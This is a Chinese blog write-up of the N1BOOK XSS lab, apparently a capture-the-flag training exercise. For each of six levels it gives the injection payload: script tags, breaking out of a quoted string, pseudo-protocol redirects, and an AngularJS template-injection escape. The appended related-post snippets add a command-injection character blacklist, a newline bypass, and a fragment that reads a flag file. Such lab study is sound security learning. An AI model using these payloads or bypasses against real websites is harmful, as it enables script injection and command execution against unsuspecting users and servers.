N1BOOK XSS漏洞

最新推荐文章于 2024-02-08 17:41:07 发布
最新推荐文章于 2024-02-08 17:41:07 发布
阅读量633 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/111773400
版权

level 1

反射型XSS

在这里插入图片描述
观察url
在这里插入图片描述

username=<script>alert(1)</script>

level 2

在这里插入图片描述
查看源代码发现
这里做了编码
在这里插入图片描述

因为本身是放在script标签里,只需要闭合就可

username=123';alert(1);//

level 3

在这里插入图片描述
无果
换一个标签后发现可行

username=<img src="javacript::alert(1)" onclick="alert(1);">

level 4

在这里插入图片描述
会进行重定向
可以发现
通过 getQueryVariable函数获取get请求jumpUrl,然后会通过escape(),输出到那个重定向中
试试第二关的逃逸

观察源码发现,当10秒后会重定向到到jumpUrl的页面
利用伪协议即可

?jumpUrl=javascript:alert(1)

level 5

在这里插入图片描述
观察源代码,当get请求autosubmit为真时,会重定向到get请求action
这个不难想到了

action=javascript:alert(1)&autosubmit=1

level 6

在这里插入图片描述在这里插入图片描述
可以发现被全部编码了
在这里插入图片描述
发现有个angular.js

angular xss漏洞

在这里插入图片描述
测试成功,就是个模板注入
直接用文章里的payload

username={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
penson by 小乌
关注
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]XSS闯关
weixin_46703850的博客
02-23 1665
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
xss闯关笔记
lls的博客
03-06 3996
leve 1 第一关没有任何过滤 直接上绝活: ?username=<script>alert(1)</script> level2 f12看一下源码: 这里发现使用escape()所以这里没有办法注入,但是 username=? 这里是可以注入的,这里发现变量是单引号闭合的,所以构造 ?username=';alert(1);// 这样就成功注入了 level3 这里我们模仿上一关的思路 构造之后发现单引号被转义了 没关系,一个单引号被过滤没关系 我们可以用多个来绕过
CTFer成长之路之命令执行漏洞
梦里明明有六趣,觉后空空无大千
02-23 556
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
【BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2247
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
XSS过关(一) 1~5关 详细
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
04-04 1042
最近在玩xss,就决定把思路写下来,以备忘 第一关 很简单,把test换成<script>alert(1)</script>就行 <script>alert(1)</script> 第二关 也有些简单,找到注入点,发现input标签里的可用 于是加上 "/> 以闭合value,再加上<script>alert(1)</...
JSP使用过滤器防止Xss漏洞
10-17
在Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
XSS闯关之第二关
weixin_34146410的博客
05-15 226
开启第二关!出现有文本框,尝试用第一关的payload试一试能不能弹框肯定是不行的。从返回结果上分析应该是将符号<>的意思改变了。来查看源码分析可以看到当变量接收过来值,经过函数htmlspecialchars()过滤后,在文本框中显示。Htmlspecialchars()函数作用,是将预定义字符转化为html实体,可以理解为将原有的符号变了心没变相。所以这时候构造payload就要将...
BUU N1BOOK题目死亡ping命令
weixin_48876267的博客
11-30 847
介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串 version: "3.2" services: converter: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latest ports: - 80:80 本地搭建docker-compose 打开题目 输入127.0.0.1&&id,发现报错。存在恶意字符过滤 抓包进行fuzz扫描测试 fu.
【BUUCTF N1BOOK】[第二章 web进阶] 通关
最新发布
人若无名,便可专心练剑
02-08 1160
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
[安洵杯2019]easy_serialize_php
weixin_45808483的博客
12-09 3121
知识点 反序列化字符逃逸(替换后导致字符串变短) 题目链接 BUUCTF在线评测[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 审计代码 启动环境 打开题目是一段代码: <?php ​ $function = @$_GET['f']; ​ function filter($img){ //fileter过滤函数,将falg,php等过滤为空 $filter_arr = array('php','flag','p...
从0到1CTFer成长之路-第二章-XSS的魔力
黑白的博客
03-01 804
XSS的魔力 声明 好好向大佬们学习!!! 攻击 XSS的魔力 这简直就是一场javascript的代码审计心酸历程 摘自 https://book.nu1l.com/tasks/#/ https://blog.csdn.net/hxhxhxhxx/article/details/112784856 https://blog.csdn.net/rfrder/article/details/108930033 使用BUUCTF在线环境 https://buuoj.cn/challenges 都是用谷歌浏.
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5623
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
BUUCTF-N1BOOK-WP
weixin_42782443的博客
04-05 1372
BUUCTF-N1BOOK-WP[第一章 web入门]常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2afr_3[第二章 web进阶]SSRF Training死亡ping命令XSS闯关文件上传[第三章 web进阶][第四章 CTF之APK章][第五章 CTF之RE章][第六章 CTF之PWN章] [第一章 web入门] 常见的搜集 粗心的小李 SQL注入-1 SQL注入-2 afr_1 afr_2 afr_3 [第二章 web进阶] SSRF Training 死亡ping命令 XSS
《从0到1:CTFer成长之路》 配套题目Web WP
热门推荐
feng的博客
10-05 1万+
前言 自己刚学了CTF两个月,深感入门CTF的困难。非常感谢Nu1L战队可以编写这本一本非常详实而且全面的CTF书籍,为许许多多像我这样的弱鸡提供了入门的帮助。 自己是Web方向,虽然学了两个月,但是并不是很系统的对Web进行学习。非要给个定位的话,自己现在顶多算是0.2,距离这本书的从0到1还有很大的差距。因此为了提高自己,真正的成为1,自己买了这本书而且要努力的进行学习。 这本书的配套题目可以说给了自己学习知识的同时进行实践的机会。本来不想写WP的,因为考虑到Nu1L的微信公众号已经给出了WP。不过自己
BUU N1BOOK [第二章 web进阶]死亡ping命令
SwBack的博客
09-02 2357
存在以下黑名单过滤 ["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"","'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"]; 但是发现%0a可以执行命令 准备工作 一台具备公网IP的服务器 我这里采用的是自己的服务器,没有服务器的可以注册个小号,在BUU平台开启如下环境 首先在公网服务器上面写入shell文件 内容如下 a=`cat /FLAG` c.
DOM型XSS漏洞测试payload大全
XSS漏洞 DOM型测试 payload代码” 在网络安全领域,XSS(Cross-Site Scripting)漏洞是一种常见的安全威胁,它允许攻击者在用户的浏览器中注入恶意脚本,从而控制用户与网站的交互。DOM型XSSXSS漏洞的一种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值